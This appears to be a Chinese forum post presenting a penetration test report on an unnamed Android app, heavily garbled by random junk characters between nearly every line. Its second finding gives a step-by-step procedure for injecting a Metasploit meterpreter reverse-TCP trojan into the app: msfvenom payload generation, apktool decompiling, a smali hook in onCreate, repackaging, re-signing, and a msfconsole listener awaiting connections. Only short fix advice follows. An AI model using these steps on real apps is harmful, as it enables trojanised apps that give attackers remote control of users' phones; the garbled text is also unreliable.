$ ? O9 b2 | F ! O: `0 o& j6 G2 \$ c

1 r: q) g" M$ ^ ; Z9 t) A8 B. A4 ]5 U+ M 1-2 测试结果 5 V" G; I9 V+ m1 o; Q7 b; r, C: ? ) j$ H8 x. w2 U x7 P Y$ g/ z+ `

$ T( d, l" W' E: D' k* N. F: _ x+ r; m0 _

' H9 D6 ~4 O8 G: o0 ~6 |' s 8 B: N$ S0 Q. O2 ?) C! Q# g5 P3 D. M   0 F2 |. U3 @1 r. s3 |6 V1 y & w) F; W9 q# M' A

* \6 i0 o* s1 I ! x3 q1 Z1 o3 @8 u

" J; i1 _, }/ P' m; ^ & `6 P6 _, s/ k7 ]: E8 u3 N( m, Z 2 检测结果                    * h% b; @, g' l9 c1 K% A6 w: I$ G5 e! u

1 N) [; o# r# O) i' R/ _- S! q 8 p! X: {$ w$ V

2 A) h7 X* k. K3 A! f$ M$ _; w. `1 i( l7 [. U7 u C 2.1 某某某 5 S* ?/ i- i9 t6 L- }+ ]* @ q4 ]/ l3 h, t' _$ L

2 [ l9 J/ l8 @+ C- E9 x / H) K5 M, m- @% @

; a. l Z( Y7 @* C6 @- e; b5 ^) m" r0 H( E 2.1.1检测目标 7 J, ]6 g1 _: z4 z1 I, v+ y; X2 j7 G z9 l* L

! _1 {, K ]! Y$ ~7 A$ Y* k$ Y" n* T! D* Y. i

. [8 o; \' \ f 8 g: l$ i6 ~- D. `1 T/ a6 ^ 目标地址: 某某某某某某APP $ m: `( W) X' V0 S& ~0 N9 V+ d8 k# a1 u d& b- G. H: y0 C

/ o& q3 R, `2 j8 v + V1 v+ l- m& [2 \4 Q, n! `/ H

' X! L. S; v# E% R0 ~+ I6 e ) p( m! x( D: M/ x8 l 2.1.2检测结果 / x7 h- g' P2 ?$ y7 F. k 2 }4 w+ ]: f2 ^

& m P4 G2 R. ]9 S # V" _0 `4 X" J' I/ S# R

( K, z7 ~# s0 d9 }% W! U7 h! M) }3 H: Q d! H 2.1.2.1 0 K- o$ D/ W2 d# F! ~+ I- m \ Q6 f4 h0 y1 X2 |$ u k$ _

% w, |/ y1 A! Y! u% F 4 X, I( {) m) ]3 ?; w' X" t

8 M( I! j! P3 e! X* K- T ' `. a: b O3 g m; f# p# W 漏洞链接地址:某某某某某某APP ) V }' f2 [& ^ - m5 z+ ?; @8 w" K9 T) `

1 e7 q: ~( h W4 y3 S0 h6 ^4 h 9 R- O0 s1 Z, M; S+ `

/ T Y, }* q; c7 R" u 1 |4 a6 O6 \' e, o   $ ?0 W- P, y& i: i8 G8 x' ^ " ?# S+ \. \; G2 S: @0 D

/ O0 J* `5 T# w0 P3 n r, x; S2 @+ o# q9 T

. K6 z2 N* f# C- d4 \/ Q# H! a; s9 X/ e$ q! z* h 漏洞分析及取证: ' O& _! U4 q/ O/ w4 F - ~* ^4 t. |/ X

# W, e# P' I- k1 u/ r1 e 3 ]& _. B+ W$ R4 p. j% g/ v# S

" a- K9 s4 f$ f Q9 f8 W7 E7 ]8 G3 Q( e                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: _7 [- b1 W3 W+ o- V: `, }2 _& k ; J U6 z7 X) ^

h' ?; E' z$ x$ r9 y( ~: _5 x5 d- s# | b" d

: w! i! p# J! \! N) B" h7 A ' E1 K; k( Q* C' r9 K( N3 e1 O% j      : f2 G7 o7 e6 e8 x. t' C |* t$ b* ~

' V; [9 j/ T6 X; }8 l) [ }+ g! d! k! X* {7 q0 Q7 v

) e/ b$ z& K8 J! L3 [8 \ ( b8 w. T0 z( q/ R. j4 g/ @                       ; u% c. B0 [) |- }! s6 v8 Q % E. q) y4 _/ }

" ^/ G Y% U6 a6 g3 @ 9 j2 }& H& f" v1 T% V6 I5 s

! l; ^# G2 ^( X ]$ C7 \ ) W* `9 s( [% c b; E 2 R- k/ w2 ^( K! C2 u 0 M: W5 l. G, \# p4 W

: H; I0 S1 ^# V# R% i2 ~; F' `7 w# {- o; g! [1 ]& H4 [2 J, r

2 w. K. r9 g' @) C& F8 r% Y " E$ Z2 J8 e. K3 p" R ( i+ n- X e0 G x6 a; N 8 \3 B" z t2 U

& f! b' z1 @: y& c* } : O# w% b1 r) n: |0 u' e5 A! _

8 s+ e. \, F/ H5 U+ R ; L8 T% w, w1 o4 e/ k7 l, z; g, o 8 Y q1 r4 f. [& \, w & n% Q. x# G. L/ D Q

- n' M6 B( O6 K, V ( Y2 z5 f9 M2 {9 f5 K, o

0 K2 d6 f9 R2 d- C4 A 8 F4 H' i, j5 [& F, ]. h/ ? 漏洞危害:高 5 ~6 C E0 F q7 r6 N0 q: b6 s 2 ]; c( T% b' M! M b

4 {* V T9 l7 m$ R4 C2 r. c 9 ?7 o" s+ Z& ]5 s, K
3 i$ S, I* D7 C) h N - ]6 z9 i: x3 [ 1 L* a# O; T. |2 x, V% \; t9 D1 X5 U1 r9 P k0 @. u/ \' N w: E" I" y a; n6 K: j3 L( [; U6 L" O# z$ q+ Y& _. S, e6 \ }% @: D. U3 F8 a# F' O* O: k+ x% h* Y, R) Y& k; O5 R9 G' R' \0 c6 f9 o8 Y1 E" @: P$ v. Q+ I2 U, g- w% F8 Q* {- x2 j6 D/ _! _' k) c6 N. B- |5 s4 m* b" w d( t6 z7 i0 w) ]3 J8 L/ d! U2 ]. k: f' R* M, v/ M- E: _. g/ c% s, e8 a( {! Z3 Q; C p9 x* y& t& z7 Q7 C& z$ g! `. _1 N8 g- w, `7 S, G# ^) Y6 X: i5 R+ C9 c6 y: J6 K% r" e7 G, Z, ^) ^% z* P( U) V; m2 ~* z f9 s" Z3 V8 B: W% ~9 D2 H; q+ e/ [6 i- \2 x2 }! @" b% J) E" x2 o! [8 Z& g, ]9 I# ^8 }- j
) A! L( A0 v e8 m8 U/ |* V. I ! O2 e7 X* x* S* {9 ~* P0 B

4 G2 ]. j5 X# l4 @3 ^ 2 ]0 X8 k* u5 W0 P. S9 V 严重程度 ' L) _ c8 A+ `) l C$ j& P 3 a# c' ?/ S; H$ A

, [) B' z# O" |4 E" L/ _! M+ y- V' @' O0 F$ w; H: H 		# h' M+ l) K2 O/ K * q. _1 Z( G+ h6 r+ S

$ q2 I6 x ?. P2 G& b % I9 k; K0 j" H0 t* ^4 |- d % g) ?' }1 I E 5 L) i( P% K( a

' {0 }2 @8 i+ K" v' ]) T2 n9 x! h + e* ~: K6 N) [2 q% M9 U 		3 Z' e0 [) U" g# g+ M4 o% c 7 A# y* y, C4 w' _& x& s

( S+ J h, r, T! u2 X* V 0 F. O0 y9 m: v4 o* g# ~% j; v $ K6 I5 h0 t8 i. z/ R% D 7 a" a( Y. m- D$ V$ B& Z

* ~) I, s. ^) c% i % i2 c* I% N5 a 		$ h) o" E; j1 o 8 o3 k$ I6 M3 {# g

/ _6 S1 [+ r% F+ E' v" { m2 Y7 [0 q3 ?' G2 `6 I. A% y! W & ]8 D2 O( G! v$ y" h ( s9 ? F8 I7 @8 r8 l; g: I9 H

3 C$ b9 M1 I: r5 _7 l, D 0 E8 u+ }% Y* ]2 _ 		- Y o" B, R8 s+ B- P6 G o 5 n' f) o+ Y. ^- j

7 s& {/ Z4 y+ V+ }) `# j " e# B& i7 U9 a+ h" M; F   , S0 c9 ^; X: `+ Y$ U! S- O3 }8 q* {- N& K' N6 Q7 C- X

, }9 r( h- L7 V# Z- s! O2 f7 l) {8 ^4 y/ H/ ` 		9 i) v$ B) M$ z* w4 q( \ 0 ^" v) ~ A8 A2 X9 y. k: |

/ T2 K$ X) b; E$ O' w/ [8 a 9 m/ P1 w7 K7 ? ]% G/ i' ^ y % v& ]2 J6 a5 M0 N+ j/ j " A! d3 K7 ^4 F/ R7 I! l2 j

v+ h/ b8 b9 o6 m/ h |$ M3 W& F * Z @' C) |& D! G4 v" m 		1 ~& }' {2 q, h A " R, |% X: K9 [5 G, d4 I

, P: W% \$ B" m3 @2 ]0 G! g* _. H E5 t4 S$ l. E) z   - [9 d: c. ~- ^* a8 c/ t% Z# E9 G! ?4 p- F }

; g* ?, t( X& i5 ^- \, B& s ! b6 T" w9 H c! b
7 w% D1 y5 }3 ~8 {8 Q7 k6 _$ l " n9 N, ~# a1 }" ?( t" ^' ~
% x; J0 j; q& W ) {4 _/ I5 V7 z/ o j3 B. G: w6 G

# L. }( U" \$ o' g: a$ k& L# {% M8 y& \- T+ e   : i( Q$ y5 Z- x L0 H # ^- N4 \3 }4 e9 P8 k

( S5 w# Q, E/ B- S4 y2 k 1 U/ B% o! h1 O7 B5 R8 O$ y8 e; P# A

( X* g9 y2 O& L # y4 u5 f e: g8 L 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 : Y6 U" e1 F5 b/ g E! {6 _# K% {) J7 Y% A8 S

6 P, {. v6 k) v% D: N4 g 0 Y3 P& R6 L" ^6 Q( Y/ D

2 Z; q% D0 s% B. x( \ 3 `* S* Q G1 R, v* Z% {$ h           $ M6 t8 j* @& {8 {; ~& O U' n ; i3 L1 q# ]0 E

& ~7 N9 \* }1 c+ Q* o4 H( a: X, O" `5 W9 g& _

/ q# _, O. z. r& _. B- R0 w' x- X4 {6 J4 p: ]   : D; V+ p3 v; a+ i # E; }/ W! T4 }3 R+ ]' S% T3 V, ~( @0 _

) ]: |( c3 e( `$ H' a+ S + A6 [5 r8 t7 }+ A" n+ i7 o: e

3 j7 I8 h' i/ v% m7 Q ( O6 z) d3 z* b' L 2.1.2.2 & J m: _& i' @" @5 D5 F # \4 ?4 N3 _' `. s T- Z

Y# j' d! Y8 T; P4 a1 C - F9 r0 }* S* X4 q( v

- n' c# S/ q! S- i. d 0 h9 X$ M2 H$ k. X 漏洞链接地址:某某某某某某APP + W% z8 |( G- e6 r6 Z/ @ % ^; }2 y% u8 r3 Q: N `$ `" |3 H; D

5 X0 n u/ G6 v; _7 ^5 V& l- T+ [$ ]+ z" h( S

7 I9 d1 z' j* i4 t' h p ! G6 ]0 u* \- {: n3 ]5 C0 a8 v 漏洞分析及取证: * D( |3 a- i( h A2 I- k ; h2 M/ o7 A9 e; U) a, h; F

) {0 Y4 @1 }* p% Q* N' d {4 w* U9 \4 N/ M

# Z' _2 u5 j' I) P. ] * W! L; W. m0 @8 W; v6 H                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: ( S% ~3 M0 U5 s+ j5 L ) h# {+ G6 D. x0 f1 [6 U3 o, t: P

J& G3 D1 P+ ?" ]% M ( z6 f! H3 T% t# b v$ n

/ l k% ~5 Y, d 1 `0 @. u4 p+ | Metasploit 生成木马 apk " N2 F7 u. d2 r 7 \' k4 V+ _$ X: u: N% x

k# `2 v& J* F3 ^ ; V) m+ y7 z" c( T

6 G- F: y; f3 ]* ~. b4 q6 e' P/ p `3 y( o5 B msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk # e. f% _; r# P8 | ) h2 v: S% A: g: T4 I. b

- V P) Q2 ~& A0 d' K4 n 7 ?4 h; I/ B7 w+ s

. y( X) b4 ]" _) | 3 S: ^9 ?( R# }9 j: b, N 反编译目标apk和木马apk E3 O( v* p) x7 u) e8 {6 t' }: ~& A: l6 S$ i

. N; d1 V) L U6 c3 r8 ]6 Z: k0 A! H U

5 ^% X# N. G5 _, j5 Q2 p- { ( b" k, |: j3 N) u apktool d target.apk
6 o1 B1 w+ v, j ^; R 1 ^5 y( D6 |/ N8 A0 } apktool d cockhorse.apk . N' }6 M: O# g' H / R- s! W6 f6 K5 r

* X9 K) A8 {+ Z* X0 D' g: U% e * H# |7 E" @. P5 H' v

+ W7 ]0 i p8 I$ d5 l" L& F: {+ u4 P$ u1 A T6 L 木马 apk 注入目标 apk & O2 u) w3 q% i/ |' r ) R6 C- y8 I. U( N9 ^0 V

( g' o: u d" D+ E2 |. s 0 z7 m' Z% U: C1 K1 w

" r( H. s9 ]3 j0 i# E . i4 {2 A# H8 F 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
, n' R6 O$ H$ X2 [) D. @9 [6 h$ m! P! M. h3 e r invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ( h6 d ]6 K- w+ w5 ~ # D/ \ I* p4 v

4 c) S7 V+ Y% |/ e# q3 k: ]/ C8 B

k+ _( N& @/ v" m7 a ! m/ k5 A2 | r 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 - j8 b1 z* b$ e% m$ r( W" R% j* B O# K

7 E! j& R" A) @- G' Q ( V3 c5 |; e( u# o

1 F7 Q2 [( o4 | * S/ o6 G Q1 y& i6 N 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 0 k }1 ^: F! X: X$ }7 r0 D. b ; W5 y4 R8 y1 [+ Y# l. @

0 `; \$ F8 W3 w4 F* G4 v* U( X4 {( a8 h! m8 W2 ~8 P

$ @% y1 }9 [8 a, R) }' _# w `- k( h 4 `, ^+ H& `! b# \6 Q- b 回编译生成最终 apk 3 K; b' v- D. k6 Z; p a! s* L. R & y0 Z. |0 T) @3 V, u2 W

: m0 |, a5 M( w) {' [$ C4 A4 x* e; W

6 |" n7 q6 ?/ J7 E, z, Z% ~7 w' X - Z% K( b' e% ^ 重新打包 L: R1 j; `6 U: Z5 o: n R3 P . i0 H3 r. b/ ~% {

7 q- z0 y0 O# ~% ?6 p # C( f9 k: Q! ~

5 |* }0 c8 T! S 4 i# i4 D. `" E, @5 c2 { apktool b -o repackage.apk target_app_floder ! w3 W! ^( S+ t/ J3 K 7 v" e( I! D& R. e

3 A* W/ f x/ Q" z5 g8 I # t. t0 E$ |9 ?

- i5 `1 B. Z/ o : t; g/ z6 m8 G* L. C4 W) K3 ^) O 创建签名文件,有的话可忽略此步骤 % W2 ^: ]) `: v1 _" d1 q 9 U4 ~, M4 k6 q8 a4 F3 a9 V+ B( i( \

( C( \$ k) u! I / X1 Q2 W8 ~: L5 K4 ~6 e( u

7 ~) U# d0 F: S' d" A7 U 4 @( E2 t! G; Q& f/ o- \ keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                0 x7 X, v, H. K2 Z6 c0 J Z3 ~9 ^1 L" A

f$ B; ?5 L# Z6 `5 o3 @ + I3 l7 s' v" t1 L, [! M1 H

5 }& W' \2 o$ ^ ' w) t" z+ S3 A- o% u. B4 m 签名,以下任选其一 - {( b( c+ ?1 o4 f7 @ X9 z% J2 X0 w& c& e q' ^

4 R' `' A0 z) J; \5 S6 u; j/ F5 ?# ?

+ H9 V) v: I a) f: T2 r% p* _ 9 N0 B4 U+ i, S1 K jarsigner 方式 8 K4 K3 b, A2 U. T/ Y# x' U; g " Z% r4 Y" X3 A; }8 m: \

. F, A4 H) T/ q. L. |" p 4 u( v: K7 e2 N& J

% n- s- f$ y# J* L1 O7 i: g5 h- P, t) l+ b jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ' q2 [4 b3 c! q9 |( c/ O0 U4 s* N( \

6 m1 B7 u2 e! p5 Z- w! t7 ~8 R 5 L" u& j! P& s! _, Z

1 `+ n- Y$ Z( e0 i2 q' v0 w/ ~3 l ; b& t' }# z+ R apksigner 方式 5 v4 u- A7 I* W3 w8 x 6 J* `1 b! K! C

8 V* R- ^& t* D+ q9 t# `% ` $ l0 v0 @% O( \1 Q# s& X

" \; m* I/ }6 M: h6 r' X ) J+ ~3 T; d& u9 b9 G apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 8 d3 h# ]0 B7 a+ @2 {4 A( o: E1 O) x9 ?

' t/ H; N3 z+ h6 B s0 t. u6 @1 `' ~4 A" g% e2 T ~

: G% r* [; I+ _0 Y m7 y0 P& m, w; p8 _! n, r$ u 如需要禁用 v2签名 添加选项--v2-signing-enabled false - _5 z6 B' v4 K9 ^ / z( `& y) s: c

& b4 e; Q9 g$ n* h/ O ) ^ R! R8 `/ o! x/ E! W8 z- G

" e+ E8 S. Z5 B L' M% h 0 j5 g! L+ m5 @3 f 验证,以下任选其一 ' _& b; ?" r# } ) q) j- N2 h* U% i9 a1 l% @; Q+ h

; C6 s) F& V+ R, L9 S $ A! J# Q; Z2 z( k3 t* G

2 H5 x; g! | ?8 |* d # ^% O, i* h; s1 N- k jarsigner方式 7 R$ j# h# ?1 [$ V7 F% H' t. P4 P) C$ K0 P, l$ X$ t# Q

; n) X+ V6 a9 n5 X- x/ p+ q - A( T1 t* ]4 F

$ a: F& C* V- `+ d- ?( r8 c7 g ) l" R% E3 Q$ d2 {) |" u jarsigner -verify repackaged.apk " x/ E0 @7 x% v& N0 Q3 S5 K( o 9 m! R) i' J- o: @ K0 @

z. b7 J: ^9 t' x7 c" P( b- q ! ]2 H; Z. T B, @

! \8 b! w W+ i6 C8 v {% L % b5 j" i G" a4 t+ P5 V6 U' x apksigner 方式 & |) A; e5 o* w/ ?) a) Q: q ! W7 Q1 m5 v4 R6 z9 q! K0 U4 i5 o8 r

- J! ?- S: d. F K/ A# R& E0 [1 L* ~! n3 ]

2 K. H4 r( ]5 Y" G" O0 }, D+ X- {6 ^3 h+ @ apksigner verify -v --print-certs repackaged.apk 9 W K& B) q8 F+ u F* L, ^ * h/ v: Q8 u2 Q! [6 t

2 T# z* Q: ?+ A4 `# L6 t; B" v: l' M 5 e% j ^0 e4 J+ B. r* a

* B9 {* Q4 X) |4 ]7 s+ H0 V+ E, C$ O4 t F2 T. \3 ` keytool方式 / D4 W5 r3 C; q; L( }1 E$ ^% G% R3 [( q/ s+ q B- _1 E

, d8 w: }+ }9 H* [, U0 c. y # f% v! Q4 I# b: O6 U1 p

' x7 K: w; G+ t. T5 v: [ y0 k5 j/ W; C4 u" E" }# Z! O, l keytool -printcert -jarfile repackaged.apk 9 Z, l/ K7 y; ?. n/ ? ( `8 S c3 [- u

: |* M# i2 b. g; Q I- ]% v$ {. b% s

9 C- E8 p- [$ G. n9 B" H; M ' V/ {4 G7 z7 M0 X: B+ W& n# m 对齐 + a5 n5 D; ^- Y- `, ]! @' E0 M# y" J7 u/ i3 x% e/ R7 j

- z) B7 k3 x$ ]' K* G5 Q& W( L q/ f0 E, f- F3 y

6 F# c) b) s7 S8 B# o( R( V# Y 8 z7 e" l' b( i/ ^$ r2 z( r7 | 字节对齐优化 ! B# j/ C7 F+ O- e& t0 L3 V . e, W4 t. Z( t0 J# y" E2 h

3 C$ h' c o8 Q. H7 Q' Z8 @* a * v: l" A8 a2 Z: b3 X

: c5 x6 O/ q$ i& [8 r 3 D) N& b) P. Q- \ zipalign -v 4 repackaged.apk final.apk ! h( W2 a* |! c+ \ 1 Z9 C% s5 H; ]- F) \

3 v/ }3 n- T, ^, D; R 7 n- \% T$ X; {

9 {" X* D% V" T% j2 n- A7 C* T: B& [/ X1 K/ S* Q 检查是否对齐 , q! o* `4 d X# A5 O7 t, P: t ' ~1 L8 I0 Z: e3 K) S* i

0 q. T3 ?3 v% G, j2 K q9 m$ ]& Z* y# f* x

6 X7 E0 F4 Y0 m/ i j' u" [1 e/ B- e+ \ 2 [8 `1 j( e9 o, |( q0 S zipalign -c -v 4 final.apk + v( V, }9 d* ^6 k1 x, m: n4 a1 f! u5 h" S. u% h: _

" d @$ ]8 D; Y+ {* x e0 l5 U2 Z/ t- B, w

% q1 X" g7 ]4 ^% k' _( W / G) m! b1 y# Z' N/ L7 v& o+ V& D 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 6 R$ y1 t4 |/ f- {0 W" r2 V 4 @5 C; X1 \" o% A, d8 ]% x

( U( b) V, E6 U. F" I7 h7 U5 Y/ m$ w$ y% i3 h4 Z/ h3 x

9 W: o" L$ F, j/ l1 i3 ~6 F6 v x7 u6 O : X( K0 O. k4 j l1 `7 }% C 启动Metasploit控制台,配置参数等待上线 & S# O! c& D4 ~( s4 @: Q# X: R# ]7 e! H

9 L1 ]0 p$ X, n$ T+ h 5 f4 v( O( L2 C. a. z! v7 e

" V1 W1 F1 h G- x$ K$ s! E ' t8 H; |% X/ D" L8 H1 e" E9 _% q | 在终端依次输入如下命令 . @& v+ s$ C) z# l - P+ J5 i6 [6 N1 E4 z4 f: D; c

' h$ E& C7 R4 E- ?( e$ t/ m$ n) k! K

p; J6 J- y3 o. t( q2 h' S! x% G9 q5 [9 w8 e# l msfconsole " ?0 m2 i9 ]8 q7 z0 P* v, b6 V% G# ]2 N$ W3 P8 r

" O7 e4 X' t2 Z9 I' f z7 Q, A" |, ~: j2 s4 u$ L: x

, o' o4 l2 p- ^9 P4 b/ u: j7 ~7 U$ z6 [7 ?. |9 h/ E8 ` use exploit/multi/handler - \; r, h* p3 ?% P3 Z2 n 1 R3 N& K9 y4 |0 b6 j

0 k, t9 [" i1 P $ o. }. a8 b! N: O8 q

8 g5 [4 \1 w9 v . U8 Z+ n; r# T) G set PAYLOAD android/meterpreter/reverse_tcp % t* k4 _* ^- o) V# O - ?- z# _2 ?) Q% `3 D7 |

5 ^! w$ m5 |- M5 z# G7 y+ s7 W+ o I+ I! _, H: y8 u

, k4 ^1 U7 G- ] " [3 Y' D# G4 M/ Y x- E set LHOST 192.xxx.xx.xx ( C4 w# k% i5 A6 M- O7 L1 M9 k* T: y2 M2 p% w4 P8 d2 T, l

b' T8 N0 d- f' R% C: Y S+ C4 V+ J5 l7 b

0 L7 V: [& s. o% \' @4 w 6 Q) a; R; r9 Q) g8 h. g. ]+ }* } set LPORT 4444 0 K. d2 v: U" J+ N( ^$ E' O 2 Z% P6 ~: p/ v6 j: ^ G

3 `/ i- C, ~+ s- _% Y$ G! n# m* H( W3 L% c: y I

8 ?! F& O6 h+ X/ [5 L6 I# q# F f* E exploit / v) ^* t8 R4 B 4 y1 P, I `- E( A: G$ Z, h

2 x6 ]3 t/ s1 J# ~+ ^4 l ) f' {/ ~! }8 _& S

: a( B! z$ P6 x0 T 2 i5 _: Z( o, m* @& b! W; L% Q 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               9 r5 w" E: i0 N- @; B( a & \9 `. U' y1 Y7 N" b7 Y& c

0 q0 A2 {5 w" y) Q1 f8 S' {8 D$ e; _& r& E6 H

9 f+ s" e5 M2 k* O* H- c % z- G/ r/ n; T) a4 Z 漏洞危害:中 2 h8 s) X( r( q0 x" x7 E- ~; Z4 n$ g ^- c1 f

: \8 X& b1 ?9 O. @) v $ o7 g, G W) m6 v: V8 d* x. P
/ @. X, ]4 [- P3 |5 V 2 n, w" I* {' t+ \' u; P * g% [4 y- Y* o ) W v! V5 C3 l) d) h @ + D& r" H% \. I1 @9 y9 x# X$ H- W# `; ?) f8 V5 `6 E. }3 E: U6 _' U M# Y; b9 o. ]$ G* }$ F7 X& Z4 _" d# B8 v0 f0 s- k/ o2 n# d' B8 R% U G Q4 q6 S4 Y, H+ _' T, ?# q% P! w3 N4 A; _" q. W8 r: r. U# j, Z9 S& Y# x; \: W4 M* g% Z: h. d$ a# J$ J4 G) r: }: l# p6 [- J& |. V3 N; Z6 a( P0 C- O* o0 e o" z9 ?% |9 o4 w+ f8 p6 r, y M/ M1 x. q3 s0 \1 a+ c8 P7 {* I2 ]/ M' q5 B' d5 n& A2 _7 h7 b I, W. Z* a/ N# {3 I; k. t5 ?" p. ~, b" M5 R/ Y. {, Z- n( }) ?5 q) [8 W6 G) a4 {( O7 t0 v1 @8 C/ m5 t% l4 N( M& x& X$ b+ U3 c/ }' ^# I4 v2 Z* `# v- ?+ D q2 P" n, a, ] i4 u/ N: d; I
3 r# Q: M/ W9 T1 r8 b# [# E # Z. I1 h r+ @$ z5 ^

' A! T; @* g, D, l1 H ; r' `) g; k$ D 严重程度 , a0 c9 n& D/ C6 e% s; s9 z+ j# A4 Z0 w* ~2 ^( s

5 i, R7 ]6 E: I( E6 v , V. N8 b" E f1 l* o$ v' \, ^+ O 		) `7 v" k" s$ O- I1 Q9 d. o! Y+ g7 C ; M$ M# Q3 g9 K$ T7 c% a

5 G/ w7 H. u! M! H% D% K8 o+ C/ [$ Q 8 z4 B. F% J9 x8 L& K( h4 H . |( g5 H0 E# x7 y( P/ F

# a% d+ O0 ?9 j+ p& r3 V. ^2 @# M' w. R5 K8 |5 V" a0 E8 y 		R. k8 v+ F8 _% t * ?' b F6 Z6 m

* A! e# h5 i0 ~% J. A, t " L9 @& a' M5 J3 p) f" l" I ' G/ [' N4 n9 ~; ^+ b) ] 2 E- L* c) V" Z8 v+ d

# S/ h: Y# Z6 \: R/ x! D: B3 r1 h6 B( ~- D8 `$ ?$ P* i3 W$ Y( [3 | 		; H& H4 [8 Q2 U; s% ^3 d9 p: w" `) w2 v 5 w5 K7 v# h* g/ W

! A$ n1 r! q( ]+ \( n6 C; D' r' f V e B" T6 g$ b/ J+ Z . F0 f, n4 j; D4 L5 U) d6 W7 W/ x! Q6 N; A

% p/ \# I6 }$ Y4 }% V; D: R . i- l, H( \6 D: t' w/ b( z 		: t5 V! B5 Z7 ?2 d9 u 1 ?! {7 z$ K) ?) m7 \8 f- s % Y7 C# {* f3 V0 O, U+ Z. Q 5 z7 }" S; B# ^1 s, _

7 ?. J/ y7 q6 h- ?6 T: L p( B# u( I* T5 i6 Y   8 h* j3 Y8 v; H$ K4 v, f5 ?4 s+ A2 u7 F6 o1 J) Z' J/ e6 b. w! ^7 s# I. w

1 F% g* e5 Y% C: l% t: M + q/ W& N4 O7 N) B: G0 {3 Y5 i 		5 }' _2 f a# @, L9 \! i* h8 M Q& p! ?8 X

6 {: z% e. u0 R+ F, o 5 T$ V, z. b) Z7 @1 d4 r- V ( H- k, c' s% n, B/ |$ ^5 t- V; R: ]7 S8 P. ?- A4 y

/ H& U& O: S- S2 t6 |- N; [5 Y+ |# X7 s; u. B! @1 X 		9 W2 |/ j4 H" j7 j % y* `9 S9 s( @ j7 a) R ( n+ x' I2 h$ Q& W( F8 B# k2 \3 f. Y+ z" J, k; d% F6 s" \

5 A" @; L6 q( n5 C+ h/ a0 h$ i; x   ( i, ^8 p- c$ g* W$ u) t5 P - R4 p2 |6 q+ E0 I

5 f7 H. F3 Q1 ~- x y6 X0 u 8 t; ~' n8 s6 t* d5 G
( j: y+ R( f5 e' O+ \; o( H B4 a; p! u* z
5 Q3 h8 ^$ h4 w9 R* G& o " H# v) b$ ?; @. j$ x

: P1 i$ }" U9 W5 b0 B+ } 6 }! o5 z6 a% [' B! U: \& @8 S$ |   # W9 p0 Z, A4 z$ |6 f3 u 1 ~" p( f5 ~" q$ Z( f& H' P) ^

* j5 _0 Y% c- b% h9 N, | 6 Z* U% }2 y3 `0 H1 j' o; M6 K

2 ]/ k: I, h3 T5 V/ m1 j4 R 5 g" p6 Q' c& N 修复方法: " ]5 k. _. D; f2 }, t4 I$ N+ C s" h# |, \+ u* n

3 }* S# ~4 L+ h) @# x# f ' f% l( v! @, n. i- f7 [. L

9 N% J6 Z' L" y& R; b. { + s. |2 y. p$ j q               1. APP 启动时应做签名校验防止二次打包。
0 u% _: q) A! e9 U 0 z" Z# a X' A9 p$ j, J1 N 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 , B. d) x: o0 O; [0 D . K4 G# |- Z- O8 \$ Z7 D

. A1 s( Y1 f* q3 Q$ Q$ x$ q+ m: {3 b4 t' Y ! ~# w$ d+ N: T1 r$ I( w7 E* L+ R5 u x/ W- w' i. `" @6 H5 h6 @

9 v% A6 S5 n& j/ I ) ?- x5 F# j" e3 C" n0 ?   " a- S. B. g7 [7 l 4 E5 ]9 m" F9 z

( R9 {& M8 q2 f' n ; u7 N- }5 S0 z$ u" |. b ; B% N7 n4 x. O, y5 D) O1 H- M% A; f; @, I0 ]

/ ]$ c+ l' Y7 y 7 Q& L, m2 T6 Q5 |& |, l
: ?$ N5 l R" x( A5 v- h& j 8 ?0 g/ g% a( ?3 w7 V1 P

) n& A) S+ ]* j ! Z9 n' B. ~- F; E. l, e+ s- W% B
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表